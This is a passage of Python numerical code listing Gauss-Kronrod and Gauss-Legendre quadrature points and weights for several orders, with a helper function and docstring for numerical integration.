[ 0.4333953941292471907992659, 0.1347092173114733259280540],
[ 0.5627571346686046833390001, 0.1234919762620658510779581],
[ 0.6794095682990244062343274, 0.1093871588022976418992106],
[ 0.7808177265864168970637176, 0.0931254545836976055350655],
[ 0.8650633666889845107320967, 0.0750396748109199527670431],
[ 0.9301574913557082260012072, 0.0547558965743519960313813],
[ 0.9739065285171717200779640, 0.0325581623079647274788190],
[ 0.9956571630258080807355273, 0.0116946388673718742780644]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False], dtype=bool)
},
15: {
'g': np.array(
[[-0.9879925180204854284895657, 0.0307532419961172683546284],
[ -0.9372733924007059043077589, 0.0703660474881081247092674],
[ -0.8482065834104272162006483, 0.1071592204671719350118695],
[ -0.7244177313601700474161861, 0.1395706779261543144478048],
[ -0.5709721726085388475372267, 0.1662692058169939335532009],
[ -0.3941513470775633698972074, 0.1861610000155622110268006],
[ -0.2011940939974345223006283, 0.1984314853271115764561183],
[ 0.0000000000000000000000000, 0.2025782419255612728806202],
[ 0.2011940939974345223006283, 0.1984314853271115764561183],
[ 0.3941513470775633698972074, 0.1861610000155622110268006],
[ 0.5709721726085388475372267, 0.1662692058169939335532009],
[ 0.7244177313601700474161861, 0.1395706779261543144478048],
[ 0.8482065834104272162006483, 0.1071592204671719350118695],
[ 0.9372733924007059043077589, 0.0703660474881081247092674],
[ 0.9879925180204854284895657, 0.0307532419961172683546284]],
dtype=float),
'k': np.array(
[[-0.9980022986933970602851728, 0.0053774798729233489877921],
[ -0.9879925180204854284895657, 0.0150079473293161225383748],
[ -0.9677390756791391342573480, 0.0254608473267153201868740],
[ -0.9372733924007059043077589, 0.0353463607913758462220379],
[ -0.8972645323440819008825097, 0.0445897513247648766082273],
[ -0.8482065834104272162006483, 0.0534815246909280872653431],
[ -0.7904185014424659329676493, 0.0620095678006706402851392],
[ -0.7244177313601700474161861, 0.0698541213187282587095201],
[ -0.6509967412974169705337359, 0.0768496807577203788944328],
[ -0.5709721726085388475372267, 0.0830805028231330210382892],
[ -0.4850818636402396806936557, 0.0885644430562117706472754],
[ -0.3941513470775633698972074, 0.0931265981708253212254869],
[ -0.2991800071531688121667800, 0.0966427269836236785051799],
[ -0.2011940939974345223006283, 0.0991735987217919593323932],
[ -0.1011420669187174990270742, 0.1007698455238755950449467],
[ 0.0000000000000000000000000, 0.1013300070147915490173748],
[ 0.1011420669187174990270742, 0.1007698455238755950449467],
[ 0.2011940939974345223006283, 0.0991735987217919593323932],
[ 0.2991800071531688121667800, 0.0966427269836236785051799],
[ 0.3941513470775633698972074, 0.0931265981708253212254869],
[ 0.4850818636402396806936557, 0.0885644430562117706472754],
[ 0.5709721726085388475372267, 0.0830805028231330210382892],
[ 0.6509967412974169705337359, 0.0768496807577203788944328],
[ 0.7244177313601700474161861, 0.0698541213187282587095201],
[ 0.7904185014424659329676493, 0.0620095678006706402851392],
[ 0.8482065834104272162006483, 0.0534815246909280872653431],
[ 0.8972645323440819008825097, 0.0445897513247648766082273],
[ 0.9372733924007059043077589, 0.0353463607913758462220379],
[ 0.9677390756791391342573480, 0.0254608473267153201868740],
[ 0.9879925180204854284895657, 0.0150079473293161225383748],
[ 0.9980022986933970602851728, 0.0053774798729233489877921]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False], dtype=bool)
},
20: {
'g': np.array(
[[-0.9931285991850949247861224, 0.0176140071391521183118620],
[ -0.9639719272779137912676661, 0.0406014298003869413310400],
[ -0.9122344282513259058677524, 0.0626720483341090635695065],
[ -0.8391169718222188233945291, 0.0832767415767047487247581],
[ -0.7463319064601507926143051, 0.1019301198172404350367501],
[ -0.6360536807265150254528367, 0.1181945319615184173123774],
[ -0.5108670019508270980043641, 0.1316886384491766268984945],
[ -0.3737060887154195606725482, 0.1420961093183820513292983],
[ -0.2277858511416450780804962, 0.1491729864726037467878287],
[ -0.0765265211334973337546404, 0.1527533871307258506980843],
[ 0.0765265211334973337546404, 0.1527533871307258506980843],
[ 0.2277858511416450780804962, 0.1491729864726037467878287],
[ 0.3737060887154195606725482, 0.1420961093183820513292983],
[ 0.5108670019508270980043641, 0.1316886384491766268984945],
[ 0.6360536807265150254528367, 0.1181945319615184173123774],
[ 0.7463319064601507926143051, 0.1019301198172404350367501],
[ 0.8391169718222188233945291, 0.0832767415767047487247581],
[ 0.9122344282513259058677524, 0.0626720483341090635695065],
[ 0.9639719272779137912676661, 0.0406014298003869413310400],
[ 0.9931285991850949247861224, 0.0176140071391521183118620]],
dtype=float),
'k': np.array(
[[-0.9988590315882776638383156, 0.0030735837185205315012183],
[ -0.9931285991850949247861224, 0.0086002698556429421986618],
[ -0.9815078774502502591933430, 0.0146261692569712529837880],
[ -0.9639719272779137912676661, 0.0203883734612665235980102],
[ -0.9408226338317547535199827, 0.0258821336049511588345051],
[ -0.9122344282513259058677524, 0.0312873067770327989585431],
[ -0.8782768112522819760774430, 0.0366001697582007980305572],
[ -0.8391169718222188233945291, 0.0416688733279736862637883],
[ -0.7950414288375511983506388, 0.0464348218674976747202319],
[ -0.7463319064601507926143051, 0.0509445739237286919327077],
[ -0.6932376563347513848054907, 0.0551951053482859947448324],
[ -0.6360536807265150254528367, 0.0591114008806395723749672],
[ -0.5751404468197103153429460, 0.0626532375547811680258701],
[ -0.5108670019508270980043641, 0.0658345971336184221115636],
[ -0.4435931752387251031999922, 0.0686486729285216193456234],
[ -0.3737060887154195606725482, 0.0710544235534440683057904],
[ -0.3016278681149130043205554, 0.0730306903327866674951894],
[ -0.2277858511416450780804962, 0.0745828754004991889865814],
[ -0.1526054652409226755052202, 0.0757044976845566746595428],
[ -0.0765265211334973337546404, 0.0763778676720807367055028],
[ 0.0000000000000000000000000, 0.0766007119179996564450499],
[ 0.0765265211334973337546404, 0.0763778676720807367055028],
[ 0.1526054652409226755052202, 0.0757044976845566746595428],
[ 0.2277858511416450780804962, 0.0745828754004991889865814],
[ 0.3016278681149130043205554, 0.0730306903327866674951894],
[ 0.3737060887154195606725482, 0.0710544235534440683057904],
[ 0.4435931752387251031999922, 0.0686486729285216193456234],
[ 0.5108670019508270980043641, 0.0658345971336184221115636],
[ 0.5751404468197103153429460, 0.0626532375547811680258701],
[ 0.6360536807265150254528367, 0.0591114008806395723749672],
[ 0.6932376563347513848054907, 0.0551951053482859947448324],
[ 0.7463319064601507926143051, 0.0509445739237286919327077],
[ 0.7950414288375511983506388, 0.0464348218674976747202319],
[ 0.8391169718222188233945291, 0.0416688733279736862637883],
[ 0.8782768112522819760774430, 0.0366001697582007980305572],
[ 0.9122344282513259058677524, 0.0312873067770327989585431],
[ 0.9408226338317547535199827, 0.0258821336049511588345051],
[ 0.9639719272779137912676661, 0.0203883734612665235980102],
[ 0.9815078774502502591933430, 0.0146261692569712529837880],
[ 0.9931285991850949247861224, 0.0086002698556429421986618],
[ 0.9988590315882776638383156, 0.0030735837185205315012183]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False], dtype=bool)
},
25: {
'g': np.array(
[[-0.9955569697904980979087849, 0.0113937985010262879479030],
[ -0.9766639214595175114983154, 0.0263549866150321372619018],
[ -0.9429745712289743394140112, 0.0409391567013063126556235],
[ -0.8949919978782753688510420, 0.0549046959758351919259369],
[ -0.8334426287608340014210211, 0.0680383338123569172071872],
[ -0.7592592630373576305772829, 0.0801407003350010180132350],
[ -0.6735663684734683644851206, 0.0910282619829636498114972],
[ -0.5776629302412229677236898, 0.1005359490670506442022069],
[ -0.4730027314457149605221821, 0.1085196244742636531160940],
[ -0.3611723058093878377358217, 0.1148582591457116483393255],
[ -0.2438668837209884320451904, 0.1194557635357847722281781],
[ -0.1228646926107103963873598, 0.1222424429903100416889595],
[ 0.0000000000000000000000000, 0.1231760537267154512039029],
[ 0.1228646926107103963873598, 0.1222424429903100416889595],
[ 0.2438668837209884320451904, 0.1194557635357847722281781],
[ 0.3611723058093878377358217, 0.1148582591457116483393255],
[ 0.4730027314457149605221821, 0.1085196244742636531160940],
[ 0.5776629302412229677236898, 0.1005359490670506442022069],
[ 0.6735663684734683644851206, 0.0910282619829636498114972],
[ 0.7592592630373576305772829, 0.0801407003350010180132350],
[ 0.8334426287608340014210211, 0.0680383338123569172071872],
[ 0.8949919978782753688510420, 0.0549046959758351919259369],
[ 0.9429745712289743394140112, 0.0409391567013063126556235],
[ 0.9766639214595175114983154, 0.0263549866150321372619018],
[ 0.9955569697904980979087849, 0.0113937985010262879479030]],
dtype=float),
'k': np.array(
[[-0.9992621049926098341934575, 0.0019873838923303159265079],
[ -0.9955569697904980979087849, 0.0055619321353567137580402],
[ -0.9880357945340772476373310, 0.0094739733861741516072077],
[ -0.9766639214595175114983154, 0.0132362291955716748136564],
[ -0.9616149864258425124181300, 0.0168478177091282982315167],
[ -0.9429745712289743394140112, 0.0204353711458828354565683],
[ -0.9207471152817015617463461, 0.0240099456069532162200925],
[ -0.8949919978782753688510420, 0.0274753175878517378029485],
[ -0.8658470652932755954489970, 0.0307923001673874888911090],
[ -0.8334426287608340014210211, 0.0340021302743293378367488],
[ -0.7978737979985000594104109, 0.0371162714834155435603306],
[ -0.7592592630373576305772829, 0.0400838255040323820748393],
[ -0.7177664068130843881866541, 0.0428728450201700494768958],
[ -0.6735663684734683644851206, 0.0455029130499217889098706],
[ -0.6268100990103174127881227, 0.0479825371388367139063923],
[ -0.5776629302412229677236898, 0.0502776790807156719633253],
[ -0.5263252843347191825996238, 0.0523628858064074758643667],
[ -0.4730027314457149605221821, 0.0542511298885454901445434],
[ -0.4178853821930377488518144, 0.0559508112204123173082407],
[ -0.3611723058093878377358217, 0.0574371163615678328535827],
[ -0.3030895389311078301674789, 0.0586896800223942079619742],
[ -0.2438668837209884320451904, 0.0597203403241740599790993],
[ -0.1837189394210488920159699, 0.0605394553760458629453603],
[ -0.1228646926107103963873598, 0.0611285097170530483058590],
[ -0.0615444830056850788865464, 0.0614711898714253166615441],
[ 0.0000000000000000000000000, 0.0615808180678329350787598],
[ 0.0615444830056850788865464, 0.0614711898714253166615441],
[ 0.1228646926107103963873598, 0.0611285097170530483058590],
[ 0.1837189394210488920159699, 0.0605394553760458629453603],
[ 0.2438668837209884320451904, 0.0597203403241740599790993],
[ 0.3030895389311078301674789, 0.0586896800223942079619742],
[ 0.3611723058093878377358217, 0.0574371163615678328535827],
[ 0.4178853821930377488518144, 0.0559508112204123173082407],
[ 0.4730027314457149605221821, 0.0542511298885454901445434],
[ 0.5263252843347191825996238, 0.0523628858064074758643667],
[ 0.5776629302412229677236898, 0.0502776790807156719633253],
[ 0.6268100990103174127881227, 0.0479825371388367139063923],
[ 0.6735663684734683644851206, 0.0455029130499217889098706],
[ 0.7177664068130843881866541, 0.0428728450201700494768958],
[ 0.7592592630373576305772829, 0.0400838255040323820748393],
[ 0.7978737979985000594104109, 0.0371162714834155435603306],
[ 0.8334426287608340014210211, 0.0340021302743293378367488],
[ 0.8658470652932755954489970, 0.0307923001673874888911090],
[ 0.8949919978782753688510420, 0.0274753175878517378029485],
[ 0.9207471152817015617463461, 0.0240099456069532162200925],
[ 0.9429745712289743394140112, 0.0204353711458828354565683],
[ 0.9616149864258425124181300, 0.0168478177091282982315167],
[ 0.9766639214595175114983154, 0.0132362291955716748136564],
[ 0.9880357945340772476373310, 0.0094739733861741516072077],
[ 0.9955569697904980979087849, 0.0055619321353567137580402],
[ 0.9992621049926098341934575, 0.0019873838923303159265079]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False], dtype=bool)
},
30: {
'g': np.array(
[[-0.9968934840746495402716301, 0.0079681924961666056154659],
[ -0.9836681232797472099700326, 0.0184664683110909591423021],
[ -0.9600218649683075122168710, 0.0287847078833233693497192],
[ -0.9262000474292743258793243, 0.0387991925696270495968019],
[ -0.8825605357920526815431165, 0.0484026728305940529029381],
[ -0.8295657623827683974428981, 0.0574931562176190664817217],
[ -0.7677774321048261949179773, 0.0659742298821804951281285],
[ -0.6978504947933157969322924, 0.0737559747377052062682439],
[ -0.6205261829892428611404776, 0.0807558952294202153546949],
[ -0.5366241481420198992641698, 0.0868997872010829798023875],
[ -0.4470337695380891767806099, 0.0921225222377861287176327],
[ -0.3527047255308781134710372, 0.0963687371746442596394686],
[ -0.2546369261678898464398051, 0.0995934205867952670627803],
[ -0.1538699136085835469637947, 0.1017623897484055045964290],
[ -0.0514718425553176958330252, 0.1028526528935588403412856],
[ 0.0514718425553176958330252, 0.1028526528935588403412856],
[ 0.1538699136085835469637947, 0.1017623897484055045964290],
[ 0.2546369261678898464398051, 0.0995934205867952670627803],
[ 0.3527047255308781134710372, 0.0963687371746442596394686],
[ 0.4470337695380891767806099, 0.0921225222377861287176327],
[ 0.5366241481420198992641698, 0.0868997872010829798023875],
[ 0.6205261829892428611404776, 0.0807558952294202153546949],
[ 0.6978504947933157969322924, 0.0737559747377052062682439],
[ 0.7677774321048261949179773, 0.0659742298821804951281285],
[ 0.8295657623827683974428981, 0.0574931562176190664817217],
[ 0.8825605357920526815431165, 0.0484026728305940529029381],
[ 0.9262000474292743258793243, 0.0387991925696270495968019],
[ 0.9600218649683075122168710, 0.0287847078833233693497192],
[ 0.9836681232797472099700326, 0.0184664683110909591423021],
[ 0.9968934840746495402716301, 0.0079681924961666056154659]],
dtype=float),
'k': np.array(
[[-0.9994844100504906375713259, 0.0013890136986770076245516],
[ -0.9968934840746495402716301, 0.0038904611270998840512672],
[ -0.9916309968704045948586284, 0.0066307039159312921733198],
[ -0.9836681232797472099700326, 0.0092732796595177634284411],
[ -0.9731163225011262683746939, 0.0118230152534963417422329],
[ -0.9600218649683075122168710, 0.0143697295070458048124514],
[ -0.9443744447485599794158313, 0.0169208891890532726275723],
[ -0.9262000474292743258793243, 0.0194141411939423811734090],
[ -0.9055733076999077985465226, 0.0218280358216091922971675],
[ -0.8825605357920526815431165, 0.0241911620780806013656864],
[ -0.8572052335460610989586585, 0.0265099548823331016106017],
[ -0.8295657623827683974428981, 0.0287540487650412928439788],
[ -0.7997278358218390830136689, 0.0309072575623877624728843],
[ -0.7677774321048261949179773, 0.0329814470574837260318142],
[ -0.7337900624532268047261711, 0.0349793380280600241374997],
[ -0.6978504947933157969322924, 0.0368823646518212292239111],
[ -0.6600610641266269613700537, 0.0386789456247275929503487],
[ -0.6205261829892428611404776, 0.0403745389515359591119953],
[ -0.5793452358263616917560249, 0.0419698102151642461471475],
[ -0.5366241481420198992641698, 0.0434525397013560693168317],
[ -0.4924804678617785749936931, 0.0448148001331626631923556],
[ -0.4470337695380891767806099, 0.0460592382710069881162717],
[ -0.4004012548303943925354762, 0.0471855465692991539452615],
[ -0.3527047255308781134710372, 0.0481858617570871291407795],
[ -0.3040732022736250773726771, 0.0490554345550297788875282],
[ -0.2546369261678898464398051, 0.0497956834270742063578116],
[ -0.2045251166823098914389577, 0.0504059214027823468408931],
[ -0.1538699136085835469637947, 0.0508817958987496064922975],
[ -0.1028069379667370301470968, 0.0512215478492587721706563],
[ -0.0514718425553176958330252, 0.0514261285374590259338629],
[ 0.0000000000000000000000000, 0.0514947294294515675583404],
[ 0.0514718425553176958330252, 0.0514261285374590259338629],
[ 0.1028069379667370301470968, 0.0512215478492587721706563],
[ 0.1538699136085835469637947, 0.0508817958987496064922975],
[ 0.2045251166823098914389577, 0.0504059214027823468408931],
[ 0.2546369261678898464398051, 0.0497956834270742063578116],
[ 0.3040732022736250773726771, 0.0490554345550297788875282],
[ 0.3527047255308781134710372, 0.0481858617570871291407795],
[ 0.4004012548303943925354762, 0.0471855465692991539452615],
[ 0.4470337695380891767806099, 0.0460592382710069881162717],
[ 0.4924804678617785749936931, 0.0448148001331626631923556],
[ 0.5366241481420198992641698, 0.0434525397013560693168317],
[ 0.5793452358263616917560249, 0.0419698102151642461471475],
[ 0.6205261829892428611404776, 0.0403745389515359591119953],
[ 0.6600610641266269613700537, 0.0386789456247275929503487],
[ 0.6978504947933157969322924, 0.0368823646518212292239111],
[ 0.7337900624532268047261711, 0.0349793380280600241374997],
[ 0.7677774321048261949179773, 0.0329814470574837260318142],
[ 0.7997278358218390830136689, 0.0309072575623877624728843],
[ 0.8295657623827683974428981, 0.0287540487650412928439788],
[ 0.8572052335460610989586585, 0.0265099548823331016106017],
[ 0.8825605357920526815431165, 0.0241911620780806013656864],
[ 0.9055733076999077985465226, 0.0218280358216091922971675],
[ 0.9262000474292743258793243, 0.0194141411939423811734090],
[ 0.9443744447485599794158313, 0.0169208891890532726275723],
[ 0.9600218649683075122168710, 0.0143697295070458048124514],
[ 0.9731163225011262683746939, 0.0118230152534963417422329],
[ 0.9836681232797472099700326, 0.0092732796595177634284411],
[ 0.9916309968704045948586284, 0.0066307039159312921733198],
[ 0.9968934840746495402716301, 0.0038904611270998840512672],
[ 0.9994844100504906375713259, 0.0013890136986770076245516]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False], dtype=bool)
},
}
    w = weights[n]
    dup = w['dup']
    # Kronrod abscissae/weights use every point; the embedded Gauss rule has
    # nonzero weights only at the duplicated abscissae flagged by `dup`.
    xi = w['k'][:, 0]
    wi1 = np.zeros_like(xi)
    wi1[dup] = w['g'][:, 1]
    wi2 = w['k'][:, 1]
    return xi, wi1, wi2
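

# Illustrative usage sketch (added for clarity; not part of the original
# module). The Kronrod weights ``wi2`` apply at all abscissae, while the
# embedded Gauss weights ``wi1`` are nonzero only at the duplicated points,
# so the difference between the two weighted sums gives an error estimate:
#
#     xi, wi1, wi2 = gauss_kronrod_abscissae_and_weights(10)
#     coarse = np.sum(wi1 * xi**2)         # embedded Gauss estimate of 2/3
#     fine = np.sum(wi2 * xi**2)           # Kronrod estimate of 2/3
#     error_estimate = abs(fine - coarse)  # integral of x**2 over [-1, 1]
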
def gauss_legendre_abscissae_and_weights(n):
"""Gauss-Legendre quadrature abscissae and weights
Integral = Sum(f(xi) * wi)
Parameters
----------
n : [2-20, 32, 64, 100]
Number of integration points
Returns
-------
xi, wi : 1d array of len(n)
        Abscissae and weights for numerical integration.
References
----------
.. [1] Holoborodko, Pavel. 2014. 'Numerical Integration'. Accessed
April 24.
http://www.holoborodko.com/pavel/numerical-methods/numerical-integration/.
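
    Examples
    --------
    A minimal doctest-style check (added here; not part of the original
    docstring). Integrate x**2 over [-1, 1], whose exact value is 2/3:

    >>> xi, wi = gauss_legendre_abscissae_and_weights(5)
    >>> bool(np.isclose(np.sum(wi * xi**2), 2.0 / 3.0))
    True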
"""
if n not in [2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,
32, 64, 100]:
raise ValueError('n must be 2-20, 32, 64, or 100')
weights = {
2: np.array(
[[-0.5773502691896257645091488, 1.0000000000000000000000000],
[ 0.5773502691896257645091488, 1.0000000000000000000000000]],
dtype=float),
3: np.array(
[[-0.7745966692414833770358531, 0.5555555555555555555555556],
[ 0, 0.8888888888888888888888889],
[ 0.7745966692414833770358531, 0.5555555555555555555555556]],
dtype=float),
4: np.array(
[[-0.8611363115940525752239465, 0.3478548451374538573730639],
[ -0.3399810435848562648026658, 0.6521451548625461426269361],
[ 0.3399810435848562648026658, 0.6521451548625461426269361],
[ 0.8611363115940525752239465, 0.3478548451374538573730639]],
dtype=float),
5: np.array(
[[-0.9061798459386639927976269, 0.2369268850561890875142640],
[ -0.5384693101056830910363144, 0.4786286704993664680412915],
[ 0, 0.5688888888888888888888889],
[ 0.5384693101056830910363144, 0.4786286704993664680412915],
[ 0.9061798459386639927976269, 0.2369268850561890875142640]],
dtype=float),
6: np.array(
[[-0.9324695142031520278123016, 0.1713244923791703450402961],
[ -0.6612093864662645136613996, 0.3607615730481386075698335],
[ -0.2386191860831969086305017, 0.4679139345726910473898703],
[ 0.2386191860831969086305017, 0.4679139345726910473898703],
[ 0.6612093864662645136613996, 0.3607615730481386075698335],
[ 0.9324695142031520278123016, 0.1713244923791703450402961]],
dtype=float),
7: np.array(
[[-0.9491079123427585245261897, 0.1294849661688696932706114],
[ -0.7415311855993944398638648, 0.2797053914892766679014678],
[ -0.4058451513773971669066064, 0.3818300505051189449503698],
[ 0, 0.4179591836734693877551020],
[ 0.4058451513773971669066064, 0.3818300505051189449503698],
[ 0.7415311855993944398638648, 0.2797053914892766679014678],
[ 0.9491079123427585245261897, 0.1294849661688696932706114]],
dtype=float),
8: np.array(
[[-0.9602898564975362316835609, 0.1012285362903762591525314],
[ -0.7966664774136267395915539, 0.2223810344533744705443560],
[ -0.5255324099163289858177390, 0.3137066458778872873379622],
[ -0.1834346424956498049394761, 0.3626837833783619829651504],
[ 0.1834346424956498049394761, 0.3626837833783619829651504],
[ 0.5255324099163289858177390, 0.3137066458778872873379622],
[ 0.7966664774136267395915539, 0.2223810344533744705443560],
[ 0.9602898564975362316835609, 0.1012285362903762591525314]],
dtype=float),
9: np.array(
[[-0.9681602395076260898355762, 0.0812743883615744119718922],
[ -0.8360311073266357942994298, 0.1806481606948574040584720],
[ -0.6133714327005903973087020, 0.2606106964029354623187429],
[ -0.3242534234038089290385380, 0.3123470770400028400686304],
[ 0, 0.3302393550012597631645251],
[ 0.3242534234038089290385380, 0.3123470770400028400686304],
[ 0.6133714327005903973087020, 0.2606106964029354623187429],
[ 0.8360311073266357942994298, 0.1806481606948574040584720],
[ 0.9681602395076260898355762, 0.0812743883615744119718922]],
dtype=float),
10: np.array(
[[-0.9739065285171717200779640, 0.0666713443086881375935688],
[ -0.8650633666889845107320967, 0.1494513491505805931457763],
[ -0.6794095682990244062343274, 0.2190863625159820439955349],
[ -0.4333953941292471907992659, 0.2692667193099963550912269],
[ -0.1488743389816312108848260, 0.2955242247147528701738930],
[ 0.1488743389816312108848260, 0.2955242247147528701738930],
[ 0.4333953941292471907992659, 0.2692667193099963550912269],
[ 0.6794095682990244062343274, 0.2190863625159820439955349],
[ 0.8650633666889845107320967, 0.1494513491505805931457763],
[ 0.9739065285171717200779640, 0.0666713443086881375935688]],
dtype=float),
11: np.array(
[[-0.9782286581460569928039380, 0.0556685671161736664827537],
[ -0.8870625997680952990751578, 0.1255803694649046246346943],
[ -0.7301520055740493240934163, 0.1862902109277342514260976],
[ -0.5190961292068118159257257, 0.2331937645919904799185237],
[ -0.2695431559523449723315320, 0.2628045445102466621806889],
[ 0, 0.2729250867779006307144835],
[ 0.2695431559523449723315320, 0.2628045445102466621806889],
[ 0.5190961292068118159257257, 0.2331937645919904799185237],
[ 0.7301520055740493240934163, 0.1862902109277342514260976],
[ 0.8870625997680952990751578, 0.1255803694649046246346943],
[ 0.9782286581460569928039380, 0.0556685671161736664827537]],
dtype=float),
12: np.array(
[[-0.9815606342467192506905491, 0.0471753363865118271946160],
[ -0.9041172563704748566784659, 0.1069393259953184309602547],
[ -0.7699026741943046870368938, 0.1600783285433462263346525],
[ -0.5873179542866174472967024, 0.2031674267230659217490645],
[ -0.3678314989981801937526915, 0.2334925365383548087608499],
[ -0.1252334085114689154724414, 0.2491470458134027850005624],
[ 0.1252334085114689154724414, 0.2491470458134027850005624],
[ 0.3678314989981801937526915, 0.2334925365383548087608499],
[ 0.5873179542866174472967024, 0.2031674267230659217490645],
[ 0.7699026741943046870368938, 0.1600783285433462263346525],
[ 0.9041172563704748566784659, 0.1069393259953184309602547],
[ 0.9815606342467192506905491, 0.0471753363865118271946160]],
dtype=float),
13: np.array(
[[-0.9841830547185881494728294, 0.0404840047653158795200216],
[ -0.9175983992229779652065478, 0.0921214998377284479144218],
[ -0.8015780907333099127942065, 0.1388735102197872384636018],
[ -0.6423493394403402206439846, 0.1781459807619457382800467],
[ -0.4484927510364468528779129, 0.2078160475368885023125232],
[ -0.2304583159551347940655281, 0.2262831802628972384120902],
[ 0, 0.2325515532308739101945895],
[ 0.2304583159551347940655281, 0.2262831802628972384120902],
[ 0.4484927510364468528779129, 0.2078160475368885023125232],
[ 0.6423493394403402206439846, 0.1781459807619457382800467],
[ 0.8015780907333099127942065, 0.1388735102197872384636018],
[ 0.9175983992229779652065478, 0.0921214998377284479144218],
[ 0.9841830547185881494728294, 0.0404840047653158795200216]],
dtype=float),
14: np.array(
[[-0.9862838086968123388415973, 0.0351194603317518630318329],
[ -0.9284348836635735173363911, 0.0801580871597602098056333],
[ -0.8272013150697649931897947, 0.1215185706879031846894148],
[ -0.6872929048116854701480198, 0.1572031671581935345696019],
[ -0.5152486363581540919652907, 0.1855383974779378137417166],
[ -0.3191123689278897604356718, 0.2051984637212956039659241],
[ -0.1080549487073436620662447, 0.2152638534631577901958764],
[ 0.1080549487073436620662447, 0.2152638534631577901958764],
[ 0.3191123689278897604356718, 0.2051984637212956039659241],
[ 0.5152486363581540919652907, 0.1855383974779378137417166],
[ 0.6872929048116854701480198, 0.1572031671581935345696019],
[ 0.8272013150697649931897947, 0.1215185706879031846894148],
[ 0.9284348836635735173363911, 0.0801580871597602098056333],
[ 0.9862838086968123388415973, 0.0351194603317518630318329]],
dtype=float),
15: np.array(
[[-0.9879925180204854284895657, 0.0307532419961172683546284],
[ -0.9372733924007059043077589, 0.0703660474881081247092674],
[ -0.8482065834104272162006483, 0.1071592204671719350118695],
[ -0.7244177313601700474161861, 0.1395706779261543144478048],
[ -0.5709721726085388475372267, 0.1662692058169939335532009],
[ -0.3941513470775633698972074, 0.1861610000155622110268006],
[ -0.2011940939974345223006283, 0.1984314853271115764561183],
[ 0, 0.2025782419255612728806202],
[ 0.2011940939974345223006283, 0.1984314853271115764561183],
[ 0.3941513470775633698972074, 0.1861610000155622110268006],
[ 0.5709721726085388475372267, 0.1662692058169939335532009],
[ 0.7244177313601700474161861, 0.1395706779261543144478048],
[ 0.8482065834104272162006483, 0.1071592204671719350118695],
[ 0.9372733924007059043077589, 0.0703660474881081247092674],
[ 0.9879925180204854284895657, 0.0307532419961172683546284]],
dtype=float),
16: np.array(
[[-0.9894009349916499325961542, 0.0271524594117540948517806],
[ -0.9445750230732325760779884, 0.0622535239386478928628438],
[ -0.8656312023878317438804679, 0.0951585116824927848099251],
[ -0.7554044083550030338951012, 0.1246289712555338720524763],
[ -0.6178762444026437484466718, 0.1495959888165767320815017],
[ -0.4580167776572273863424194, 0.1691565193950025381893121],
[ -0.2816035507792589132304605, 0.1826034150449235888667637],
[ -0.0950125098376374401853193, 0.1894506104550684962853967],
[ 0.0950125098376374401853193, 0.1894506104550684962853967],
[ 0.2816035507792589132304605, 0.1826034150449235888667637],
[ 0.4580167776572273863424194, 0.1691565193950025381893121],
[ 0.6178762444026437484466718, 0.1495959888165767320815017],
[ 0.7554044083550030338951012, 0.1246289712555338720524763],
[ 0.8656312023878317438804679, 0.0951585116824927848099251],
[ 0.9445750230732325760779884, 0.0622535239386478928628438],
[ 0.9894009349916499325961542, 0.0271524594117540948517806]],
dtype=float),
17: np.array(
[[-0.9905754753144173356754340, 0.0241483028685479319601100],
[ -0.9506755217687677612227170, 0.0554595293739872011294402],
[ -0.8802391537269859021229557, 0.0850361483171791808835354],
[ -0.7815140038968014069252301, 0.1118838471934039710947884],
[ -0.6576711592166907658503022, 0.1351363684685254732863200],
[ -0.5126905370864769678862466, 0.1540457610768102880814316],
[ -0.3512317634538763152971855, 0.1680041021564500445099707],
[ -0.1784841814958478558506775, 0.1765627053669926463252710],
[ 0, 0.1794464703562065254582656],
[ 0.1784841814958478558506775, 0.1765627053669926463252710],
[ 0.3512317634538763152971855, 0.1680041021564500445099707],
[ 0.5126905370864769678862466, 0.1540457610768102880814316],
[ 0.6576711592166907658503022, 0.1351363684685254732863200],
[ 0.7815140038968014069252301, 0.1118838471934039710947884],
[ 0.8802391537269859021229557, 0.0850361483171791808835354],
[ 0.9506755217687677612227170, 0.0554595293739872011294402],
[ 0.9905754753144173356754340, 0.0241483028685479319601100]],
dtype=float),
18: np.array(
[[-0.9915651684209309467300160, 0.0216160135264833103133427],
[ -0.9558239495713977551811959, 0.0497145488949697964533349],
[ -0.8926024664975557392060606, 0.0764257302548890565291297],
[ -0.8037049589725231156824175, 0.1009420441062871655628140],
[ -0.6916870430603532078748911, 0.1225552067114784601845191],
[ -0.5597708310739475346078715, 0.1406429146706506512047313],
[ -0.4117511614628426460359318, 0.1546846751262652449254180],
[ -0.2518862256915055095889729, 0.1642764837458327229860538],
[ -0.0847750130417353012422619, 0.1691423829631435918406565],
[ 0.0847750130417353012422619, 0.1691423829631435918406565],
[ 0.2518862256915055095889729, 0.1642764837458327229860538],
[ 0.4117511614628426460359318, 0.1546846751262652449254180],
[ 0.5597708310739475346078715, 0.1406429146706506512047313],
[ 0.6916870430603532078748911, 0.1225552067114784601845191],
[ 0.8037049589725231156824175, 0.1009420441062871655628140],
[ 0.8926024664975557392060606, 0.0764257302548890565291297],
[ 0.9558239495713977551811959, 0.0497145488949697964533349],
[ 0.9915651684209309467300160, 0.0216160135264833103133427]],
dtype=float),
19: np.array(
[[-0.9924068438435844031890177, 0.0194617882297264770363120],
[ -0.9602081521348300308527788, 0.0448142267656996003328382],
[ -0.9031559036148179016426609, 0.0690445427376412265807083],
[ -0.8227146565371428249789225, 0.0914900216224499994644621],
[ -0.7209661773352293786170959, 0.1115666455473339947160239],
